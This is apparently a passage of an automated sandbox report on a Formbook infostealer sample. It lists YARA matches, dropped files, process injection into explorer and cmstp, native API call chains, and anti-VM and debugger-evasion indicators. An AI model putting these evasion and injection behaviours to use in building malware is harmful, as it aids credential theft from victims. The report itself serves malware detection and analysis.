          Source: 00000006.00000002.567494212.0000000000B40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.567601687.0000000000B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000006.00000002.567601687.0000000000B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: C:\Users\user\Desktop\u8QPnVhq0N.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\u8QPnVhq0N.exeCode function: 0_2_00406D5F
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 1_2_00410331
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 1_2_020608B7
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 1_2_02060A3B
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_0040C043
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00405873
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00401824
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00401830
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_0040C03E
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_004038F3
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00422A4C
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00401BD0
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00405653
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00420753
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B420A0
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BE20A8
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B2B090
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BE28EC
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B3A830
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BEE824
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BD1002
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B399BF
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B34120
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B1F900
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BE22AE
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BCFA2B
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B4EBB0
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BD03DA
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BDDBD2
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BE2B28
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B3AB40
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B2841F
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BDD466
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B42581
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B2D5E0
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BE25DD
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B10D20
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BE2D07
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BE1D55
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BE2EF7
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B36E30
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BDD616
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BE1FF1
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00BEDFCE
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: String function: 00401980 appears 42 times
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: String function: 00B1B150 appears 72 times
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_0041E833 NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_0041E653 NtCreateFile,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_0041E703 NtReadFile,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_0041E783 NtClose,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B598F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B59860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B59840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B599A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B59910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B59A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B59A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B59A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B595D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B59540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B596E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B59660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B597A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B59780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B59FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B59710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B598A0 NtWriteVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B59820 NtEnumerateKey,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B5B040 NtSuspendThread,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B599D0 NtCreateProcessEx,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B59950 NtQueueApcThread,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B59A80 NtOpenDirectoryObject,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B59A10 NtQuerySection,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B5A3B0 NtGetContextThread,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B59B00 NtSetValueKey,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B595F0 NtQueryInformationFile,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B5AD30 NtSetContextThread,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B59520 NtWaitForSingleObject,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B59560 NtWriteFile,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B596D0 NtCreateKey,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B59610 NtEnumerateValueKey,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B59670 NtQueryInformationProcess,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B59650 NtQueryValueKey,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B59730 NtQueryVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B5A710 NtOpenProcessToken,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B59770 NtSetInformationFile,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B5A770 NtOpenThread,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B59760 NtOpenProcess,
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\mcwfy.exe C5E0F86A68DCBD03B9A506768F86C385C360D3CF67B9CC0B5760F7B3F1D91F48
          Source: u8QPnVhq0N.exeReversingLabs: Detection: 46%
          Source: u8QPnVhq0N.exeVirustotal: Detection: 48%
          Source: C:\Users\user\Desktop\u8QPnVhq0N.exeFile read: C:\Users\user\Desktop\u8QPnVhq0N.exeJump to behavior
          Source: u8QPnVhq0N.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\u8QPnVhq0N.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\u8QPnVhq0N.exe C:\Users\user\Desktop\u8QPnVhq0N.exe
          Source: C:\Users\user\Desktop\u8QPnVhq0N.exeProcess created: C:\Users\user\AppData\Local\Temp\mcwfy.exe "C:\Users\user\AppData\Local\Temp\mcwfy.exe" C:\Users\user\AppData\Local\Temp\ytljtt.f
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeProcess created: C:\Users\user\AppData\Local\Temp\mcwfy.exe C:\Users\user\AppData\Local\Temp\mcwfy.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
          Source: C:\Users\user\Desktop\u8QPnVhq0N.exeProcess created: C:\Users\user\AppData\Local\Temp\mcwfy.exe "C:\Users\user\AppData\Local\Temp\mcwfy.exe" C:\Users\user\AppData\Local\Temp\ytljtt.f
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeProcess created: C:\Users\user\AppData\Local\Temp\mcwfy.exe C:\Users\user\AppData\Local\Temp\mcwfy.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
          Source: C:\Users\user\Desktop\u8QPnVhq0N.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
          Source: C:\Users\user\Desktop\u8QPnVhq0N.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\u8QPnVhq0N.exeFile created: C:\Users\user\AppData\Local\Temp\nsl6A3D.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@10/5@12/10
          Source: C:\Users\user\Desktop\u8QPnVhq0N.exeCode function: 0_2_004021AA CoCreateInstance,
          Source: C:\Users\user\Desktop\u8QPnVhq0N.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\u8QPnVhq0N.exeCode function: 0_2_00404AB5 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5936:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
          Source: u8QPnVhq0N.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: cmstp.pdbGCTL source: mcwfy.exe, 00000003.00000002.361655011.0000000000A30000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: mcwfy.exe, 00000001.00000003.313808108.000000001A010000.00000004.00001000.00020000.00000000.sdmp, mcwfy.exe, 00000001.00000003.313302053.0000000019E80000.00000004.00001000.00020000.00000000.sdmp, mcwfy.exe, 00000003.00000003.315528444.0000000000955000.00000004.00000020.00020000.00000000.sdmp, mcwfy.exe, 00000003.00000003.313591714.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, mcwfy.exe, 00000003.00000002.361678876.0000000000C0F000.00000040.00001000.00020000.00000000.sdmp, mcwfy.exe, 00000003.00000002.361678876.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000006.00000002.568514237.000000000498F000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000006.00000003.361053671.0000000000FAE000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 00000006.00000002.568514237.0000000004870000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000006.00000003.362960613.00000000046DE000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: mcwfy.exe, mcwfy.exe, 00000003.00000003.315528444.0000000000955000.00000004.00000020.00020000.00000000.sdmp, mcwfy.exe, 00000003.00000003.313591714.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, mcwfy.exe, 00000003.00000002.361678876.0000000000C0F000.00000040.00001000.00020000.00000000.sdmp, mcwfy.exe, 00000003.00000002.361678876.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000006.00000002.568514237.000000000498F000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000006.00000003.361053671.0000000000FAE000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 00000006.00000002.568514237.0000000004870000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000006.00000003.362960613.00000000046DE000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: cmstp.pdb source: mcwfy.exe, 00000003.00000002.361655011.0000000000A30000.00000040.10000000.00040000.00000000.sdmp

          Data Obfuscation

          barindex
          Detected unpacking (changes PE section rights)
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeUnpacked PE file: 3.2.mcwfy.exe.400000.0.unpack .text:ER;.rdata:R;.data:W; vs .text:ER;
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 1_2_00410A64 push ecx; ret
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_0040A846 push cs; retf
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00411320 push ds; retf
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_0040DC2C pushfd ; iretd
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_0040B4FA push ecx; ret
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_0040AD0D push 255F11F9h; retf
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_0041B674 pushad ; retf
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00401E20 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B6D0D1 push ecx; ret
          Source: C:\Users\user\Desktop\u8QPnVhq0N.exeFile created: C:\Users\user\AppData\Local\Temp\mcwfy.exeJump to dropped file
          Source: C:\Users\user\Desktop\u8QPnVhq0N.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmstp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmstp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmstp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmstp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmstp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcess
          Source: C:\Windows\explorer.exe TID: 1008Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\SysWOW64\cmstp.exe TID: 3608Thread sleep time: -50000s >= -30000s
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cmstp.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cmstp.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B46A60 rdtscp
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 880
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 876
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeAPI coverage: 8.4 %
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 1_2_020607DA GetSystemInfo,
          Source: C:\Users\user\Desktop\u8QPnVhq0N.exeCode function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
          Source: C:\Users\user\Desktop\u8QPnVhq0N.exeCode function: 0_2_0040699E FindFirstFileW,FindClose,
          Source: C:\Users\user\Desktop\u8QPnVhq0N.exeCode function: 0_2_0040290B FindFirstFileW,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 1_2_004089B8 FindFirstFileExW,
          Source: C:\Users\user\Desktop\u8QPnVhq0N.exeAPI call chain: ExitProcess graph end node
          Source: explorer.exe, 00000004.00000000.328321537.0000000008631000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000004.00000000.320444720.000000000091F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000002.576631983.00000000086E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i
          Source: explorer.exe, 00000004.00000002.576631983.00000000086E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000003.533383702.000000000ED9C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWAz
          Source: explorer.exe, 00000004.00000002.569424230.0000000004437000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000003.559686788.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.536187696.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533502137.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.581354235.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.553825215.000000000EF7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.563071453.000000000EF7D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllp
          Source: explorer.exe, 00000004.00000002.566841892.0000000000921000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Vir
          Source: explorer.exe, 00000004.00000002.576631983.00000000086E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000004.00000000.328321537.0000000008631000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 1_2_00401754 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 1_2_0040B06F GetProcessHeap,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B46A60 rdtscp
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 1_2_0206005F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 1_2_02060109 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 1_2_0206013E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 1_2_0206017B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B4F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B4F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B4F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B590AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B19080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B93884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B93884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B140E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B140E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B140E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B3B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exeCode function: 3_2_00B3B8E4 mov eax, dword ptr fs:[00000030h]
